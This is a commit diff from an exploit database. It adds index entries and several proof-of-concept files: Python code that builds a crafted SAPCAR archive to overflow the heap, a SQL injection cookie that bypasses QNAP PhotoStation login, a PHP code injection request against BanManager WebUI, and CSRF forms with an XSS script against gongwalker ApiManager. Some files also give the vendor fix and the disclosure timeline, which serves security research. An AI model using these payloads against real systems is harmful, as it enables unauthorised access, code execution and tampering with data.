29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
|
29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
|
||||||
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
||||||
29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
||||||
|
@ -37023,7 +37025,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
|
40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
|
||||||
40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
|
40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
|
||||||
40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
|
40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
|
||||||
40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
|
40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421 / 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
|
||||||
40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
|
40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
|
||||||
40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
|
40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
|
||||||
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
|
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
|
||||||
|
@ -37074,7 +37076,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
|
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
|
||||||
40263,platforms/cgi/webapps/40263.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
40263,platforms/cgi/webapps/40263.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
||||||
40264,platforms/cgi/webapps/40264.txt,"JVC IP-Camera VN-T216VPRU - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
40264,platforms/cgi/webapps/40264.txt,"JVC IP-Camera VN-T216VPRU - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
||||||
40265,platforms/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S_ DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
40265,platforms/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S / DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",cgi,webapps,80
|
||||||
40266,platforms/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
40266,platforms/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||||
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||||
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
|
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
|
||||||
|
@ -37116,7 +37118,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
||||||
40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
|
40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
|
||||||
40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
|
40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
|
||||||
40500,platforms/cgi/webapps/40500.py,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
|
40500,platforms/cgi/webapps/40500.py,"AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
|
||||||
40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
|
40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
|
||||||
40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting",2016-10-11,Besim,php,webapps,0
|
40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting",2016-10-11,Besim,php,webapps,0
|
||||||
40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
|
40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
|
||||||
|
@ -37830,3 +37832,6 @@ id,file,description,date,author,platform,type,port
|
||||||
41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
|
41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
|
||||||
41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0
|
41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0
|
||||||
41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0
|
41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0
|
||||||
|
41988,platforms/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080
|
||||||
|
41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
|
||||||
|
41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
118
platforms/linux/dos/41991.py
Executable file
118
platforms/linux/dos/41991.py
Executable file
|
@ -0,0 +1,118 @@
|
||||||
|
'''
|
||||||
|
Source: https://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability
|
||||||
|
|
||||||
|
1. Advisory Information
|
||||||
|
|
||||||
|
Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
|
||||||
|
Advisory ID: CORE-2017-0001
|
||||||
|
Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability
|
||||||
|
Date published: 2017-05-10
|
||||||
|
Date of last update: 2017-05-10
|
||||||
|
Vendors contacted: SAP
|
||||||
|
Release mode: Coordinated release
|
||||||
|
|
||||||
|
2. Vulnerability Information
|
||||||
|
|
||||||
|
Class: Heap-based Buffer Overflow [CWE-122]
|
||||||
|
Impact: Code execution
|
||||||
|
Remotely Exploitable: No
|
||||||
|
Locally Exploitable: Yes
|
||||||
|
CVE Name: CVE-2017-8852
|
||||||
|
|
||||||
|
|
||||||
|
3. Vulnerability Description
|
||||||
|
|
||||||
|
SAP [1] distributes software and packages using an archive program called SAPCAR [2]. This program uses a custom archive file format. A memory corruption vulnerability was found in the parsing of specially crafted archive files, that could lead to local code execution scenarios.
|
||||||
|
|
||||||
|
4. Vulnerable Packages
|
||||||
|
|
||||||
|
SAPCAR archive tool version 721.510
|
||||||
|
Other products and versions might be affected, but they were not tested.
|
||||||
|
|
||||||
|
5. Vendor Information, Solutions and Workarounds
|
||||||
|
|
||||||
|
SAP published the following Security Notes:
|
||||||
|
|
||||||
|
2441560
|
||||||
|
6. Credits
|
||||||
|
|
||||||
|
This vulnerability was discovered and researched by Martin Gallo and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
|
||||||
|
|
||||||
|
|
||||||
|
7. Technical Description / Proof of Concept Code
|
||||||
|
|
||||||
|
This vulnerability is caused by a controlled heap buffer overflow when opening a specially crafted CAR archive file.
|
||||||
|
|
||||||
|
The following python code can be used to generate an archive file that triggers the vulnerability:
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
from scapy.packet import Raw
|
||||||
|
from pysap.SAPCAR import *
|
||||||
|
|
||||||
|
# We write a file just to have some data to put into the archive
|
||||||
|
with open("string.txt", "w") as fd:
|
||||||
|
fd.write("Some string to compress")
|
||||||
|
|
||||||
|
# Create a new SAP CAR Archive
|
||||||
|
f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200)
|
||||||
|
# Add the text file
|
||||||
|
f.add_file("string.txt")
|
||||||
|
|
||||||
|
# Replace the blocks in the compressed file with the faulty blocks
|
||||||
|
f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff"))
|
||||||
|
f._sapcar.files0[0].blocks.append(Raw("A" * 0xffff))
|
||||||
|
|
||||||
|
# Write the file
|
||||||
|
f.write()
|
||||||
|
|
||||||
|
'''
|
||||||
|
$ ./SAPCAR -tvf poc.car
|
||||||
|
SAPCAR: processing archive poc.car (version 2.00)
|
||||||
|
-rw-rw-r-- 23 09 Feb 2017 18:12 string.txt
|
||||||
|
Segmentation fault (core dumped)
|
||||||
|
The CAR archive files in its version 2.00 are comprised of an archive header and a list of archived files [3]. Each archived file has a header containing the file's metadata, and the content of the file is split among several blocks. When the SAPCAR program opens a file containing an archived file block different than the known ones [4], it reads an additional 32 bytes of file metadata. The program then uses the last two bytes of the data read as a size field, and copies that amount of data into a fixed-length buffer previously allocated in the heap. As the length field is not properly validated, the operation results in a heap-based buffer overflow.
|
||||||
|
|
||||||
|
It's worth mentioning that signature validation doesn't prevent the vulnerability to be triggered, as the signature file needs to be extracted from the archive file in order for the validation to be performed.
|
||||||
|
|
||||||
|
|
||||||
|
8. Report Timeline
|
||||||
|
|
||||||
|
2017-02-15: Core Security sent an initial notification to SAP.
|
||||||
|
2017-02-16: SAP confirmed the reception of the email and requested the draft version of the advisory.
|
||||||
|
2017-02-16: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues.
|
||||||
|
2017-02-17: SAP confirmed reception of the draft advisory and assigned the incident ticket 1780137949 for tracking this issue. They will answer back once the team analyze the report.
|
||||||
|
2017-03-06: Core Security asked SAP for news about the advisory and publication date.
|
||||||
|
2017-03-08: SAP answered back saying they had troubles generating the SAPCAR archive. They asked for a pre-built one.
|
||||||
|
2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can trigger the vulnerability. SAP confirmed reception.
|
||||||
|
2017-03-08: SAP asked for GPG key for one of the researchers involved in the discovery. Core Security sent (again) the key. SAP confirmed reception.
|
||||||
|
2017-03-13: SAP confirmed they could reproduce the vulnerability. They said they cannot commit to a publication date yet, but they aim at May 9th, although it could fall in April Patch day or postpone after May.
|
||||||
|
2017-03-13: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
|
||||||
|
2017-04-03: Core Security asked SAP for an update about the final publication date for this vulnerability's patch.
|
||||||
|
2017-04-05: SAP confirmed they will be able to release the fix in May, although there could be chances to release it in April. They will confirm as soon as possible.
|
||||||
|
2017-04-05: Core Security thanked SAP for the update and asked for a security note number and CVE (if available) to include in the final advisory.
|
||||||
|
2017-04-10: SAP informed the security note for this vulnerability and confirmed they will be releasing the fix in May 9th. Core Security confirmed reception.
|
||||||
|
2017-05-08: SAP informed the release of the security note and the credits included in it. Core Security confirmed reception.
|
||||||
|
2017-05-10: Advisory CORE-2017-0001 published.
|
||||||
|
9. References
|
||||||
|
|
||||||
|
[1] http://go.sap.com/.
|
||||||
|
[2] https://launchpad.support.sap.com/#/softwarecenter/template/products/_APP=00200682500000001943%26_EVENT=DISPHIER%26HEADER=N%26FUNCTIONBAR=Y%26EVENT=TREE%26TMPL=INTRO_SWDC_SP_AD%26V=MAINT%26REFERER=CATALOG-PATCHES%26ROUTENAME=products/By%20Category%20-%20Additional%20Components.
|
||||||
|
[3] https://www.coresecurity.com/corelabs-research/publications/deep-dive-sap-archive-file-formats.
|
||||||
|
[4] https://github.com/CoreSecurity/pysap/blob/master/pysap/SAPCAR.py#L107.
|
||||||
|
|
||||||
|
10. About CoreLabs
|
||||||
|
|
||||||
|
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/core-labs.
|
||||||
|
|
||||||
|
11. About Core Security
|
||||||
|
|
||||||
|
Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.
|
||||||
|
|
||||||
|
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.
|
||||||
|
|
||||||
|
12. Disclaimer
|
||||||
|
|
||||||
|
The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
||||||
|
'''
|
29
platforms/php/webapps/41988.txt
Executable file
29
platforms/php/webapps/41988.txt
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
# Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
|
||||||
|
# Date: 10.05.2017
|
||||||
|
# Software Link: https://www.qnap.com
|
||||||
|
# Exploit Author: Kacper Szurek
|
||||||
|
# Contact: https://twitter.com/KacperSzurek
|
||||||
|
# Website: https://security.szurek.pl/
|
||||||
|
# Category: web
|
||||||
|
|
||||||
|
1. Description
|
||||||
|
|
||||||
|
`$_COOKIE[STATIONSID]` is not escaped and then used inside SQL statement.
|
||||||
|
|
||||||
|
https://security.szurek.pl/qnap-photostation-524-musicstation-484-authentication-bypass.html
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
|
||||||
|
GET /photo/api/dmc.php HTTP/1.1
|
||||||
|
Host: qnap.host:8080
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Encoding: gzip, deflate, sdch
|
||||||
|
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
|
||||||
|
Cookie: QMS_SID=' UNION SELECT 9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999 -- a
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
3. Fix
|
||||||
|
|
||||||
|
Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)
|
51
platforms/php/webapps/41989.txt
Executable file
51
platforms/php/webapps/41989.txt
Executable file
|
@ -0,0 +1,51 @@
|
||||||
|
BanManager WebUI 1.5.8 - PHP Code Injection & Stored XSS
|
||||||
|
|
||||||
|
# Exploit Title: BanManager WebUI - PHP Code Injection & Stored XSS
|
||||||
|
# Date: 2017-05-10
|
||||||
|
# Exploit Author: HaHwul
|
||||||
|
# Exploit Author Blog: www.hahwul.com
|
||||||
|
# Vendor Homepage: https://github.com/BanManagement/BanManager-WebUI
|
||||||
|
# Software Link: https://github.com/BanManagement/BanManager-WebUI.git
|
||||||
|
# Version: 1.5.8
|
||||||
|
# Tested on: Debian
|
||||||
|
|
||||||
|
### Vulnerability
|
||||||
|
Code executed via the updatesetting action will modify 'setting.php'.
|
||||||
|
In the process, there is not verification of the input value, so it is possible to insert php code.
|
||||||
|
|
||||||
|
### Vulnerable param
|
||||||
|
PHP Code Injection & Stored XSS
|
||||||
|
- footer
|
||||||
|
- buttons_before
|
||||||
|
- buttons_after
|
||||||
|
|
||||||
|
Only PHP Code Injection
|
||||||
|
- banextra
|
||||||
|
- muteextra
|
||||||
|
|
||||||
|
### Attack code
|
||||||
|
PAYLOAD: aaaaaa';$hacker=hwul//inject_php_code';
|
||||||
|
|
||||||
|
POST /vul_test/BanManager-WebUI/index.php?action=updatesettings&ajax=true&authid=3da541559918a808c2402bba5012f6c60b27661c HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Referer: http://127.0.0.1/vul_test/BanManager-WebUI/index.php?action=admin
|
||||||
|
Content-Length: 168
|
||||||
|
Cookie: BanManagement=epnsf8sut1o05ps574h4861gu7
|
||||||
|
DNT: 1
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
type=mainsettings&iframe=on&utf8=on&footer=aaaaaa'%3B%24hacker%3Dhwul%2F%2Finject_php_code&latestbans=on&latestmutes=on&latestwarnings=on&buttons_before=&buttons_after=
|
||||||
|
|
||||||
|
|
||||||
|
### Result(in settings.php)
|
||||||
|
$settings['password'] = 'asdf'; // ACP Password (Keep it strong)
|
||||||
|
$settings['footer'] = 'aaaaaa';$hacker=hwul//inject_php_code';
|
||||||
|
$settings['admin_link'] = true; // Show the admin link in the footer of all page
|
||||||
|
$settings['bm_info'] = true; // Show ban management infomation aside 'Account Status'
|
||||||
|
|
66
platforms/php/webapps/41990.html
Executable file
66
platforms/php/webapps/41990.html
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
# Exploit Title: gongwalker API Manager v1.1 - CSRF(Add/Delete/Edit API)
|
||||||
|
# Date: 2017-05-10
|
||||||
|
# Exploit Author: HaHwul
|
||||||
|
# Exploit Author Blog: www.hahwul.com
|
||||||
|
# Vendor Homepage: https://github.com/gongwalker/ApiManager
|
||||||
|
# Software Link: https://github.com/gongwalker/ApiManager.git
|
||||||
|
# Version: v1.1
|
||||||
|
# Tested on: Debian
|
||||||
|
|
||||||
|
### CSRF1 - ADD API Data
|
||||||
|
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=add&act=api&tag=2&type=do" method="POST">
|
||||||
|
<input type="hidden" name="num" value="test">
|
||||||
|
<input type="hidden" name="p%5Bname%5D%5B%5D" value="test">
|
||||||
|
<input type="hidden" name="p%5BparamType%5D%5B%5D" value="lkj">
|
||||||
|
<input type="hidden" name="memo" value="kj">
|
||||||
|
<input type="hidden" name="p%5Bdes%5D%5B%5D" value="">
|
||||||
|
<input type="hidden" name="type" value="GET">
|
||||||
|
<input type="hidden" name="url" value="test">
|
||||||
|
<input type="hidden" name="p%5Btype%5D%5B%5D" value="Y">
|
||||||
|
<input type="hidden" name="p%5Bdefault%5D%5B%5D" value="">
|
||||||
|
<input type="hidden" name="des" value="test">
|
||||||
|
<input type="hidden" name="re" value="lkj">
|
||||||
|
<input type="hidden" name="name" value="test">
|
||||||
|
|
||||||
|
<input type="submit" value="Replay!">
|
||||||
|
</form>
|
||||||
|
<!-- Auto-submit script:
|
||||||
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### CSRF2 - Delete API Data
|
||||||
|
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=apiDelete&act=ajax" method="POST">
|
||||||
|
<input type="hidden" name="id" value="3">
|
||||||
|
|
||||||
|
<input type="submit" value="Replay!">
|
||||||
|
</form>
|
||||||
|
<!-- Auto-submit script:
|
||||||
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
### CSRF3 - EDIT API Data
|
||||||
|
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=edit&act=api&tag=2&type=do" method="POST">
|
||||||
|
<input type="hidden" name="num" value="001">
|
||||||
|
<input type="hidden" name="p%5Bname%5D%5B%5D" value="password">
|
||||||
|
<input type="hidden" name="p%5BparamType%5D%5B%5D" value="CSRF_PASSWORD">
|
||||||
|
<input type="hidden" name="memo" value="login_name \x4e0e email \x4e8c\x9009\x5176\x4e00654<script>alert('csrf')</script>">
|
||||||
|
<input type="hidden" name="p%5Bdes%5D%5B%5D" value="\x5bc6\x7801">
|
||||||
|
<input type="hidden" name="type" value="POST">
|
||||||
|
<input type="hidden" name="url" value="http://api.xxx.com">
|
||||||
|
<input type="hidden" name="p%5Btype%5D%5B%5D" value="Y">
|
||||||
|
<input type="hidden" name="p%5Bdefault%5D%5B%5D" value="">
|
||||||
|
<input type="hidden" name="des" value="\x4f1a\x5458\x767b\x5f55\x8c03\x7528\x6b64\x63a5\x53e3">
|
||||||
|
<input type="hidden" name="re" value="{\r\n \"status\": 1, \r\n \"info\": \"\x767b\x5f55\x6210\x529f\", \r\n \"data\": [ ]\r\n}">
|
||||||
|
<input type="hidden" name="name" value="\x4f1a\x5458\x767b\x5f55">
|
||||||
|
<input type="hidden" name="id" value="2">
|
||||||
|
|
||||||
|
<input type="submit" value="Replay!">
|
||||||
|
</form>
|
||||||
|
<!-- Auto-submit script:
|
||||||
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
|
@ -13,9 +13,9 @@ CVE : unknown
|
||||||
<body>
|
<body>
|
||||||
|
|
||||||
<form id="testfm">
|
<form id="testfm">
|
||||||
<textarea id="child" value="a1" ></textarea>
|
<textarea id="child" value="a1" ></textarea>
|
||||||
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
|
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
|
||||||
<textarea id="child3" value="a2" ></textarea>
|
<textarea id="child3" value="a2" ></textarea>
|
||||||
<input type="text" name="test1">
|
<input type="text" name="test1">
|
||||||
</form>
|
</form>
|
||||||
|
|
||||||
|
|
133
platforms/windows/remote/41987.c
Executable file
133
platforms/windows/remote/41987.c
Executable file
File diff suppressed because one or more lines are too long
Loading…
Add table
Reference in a new issue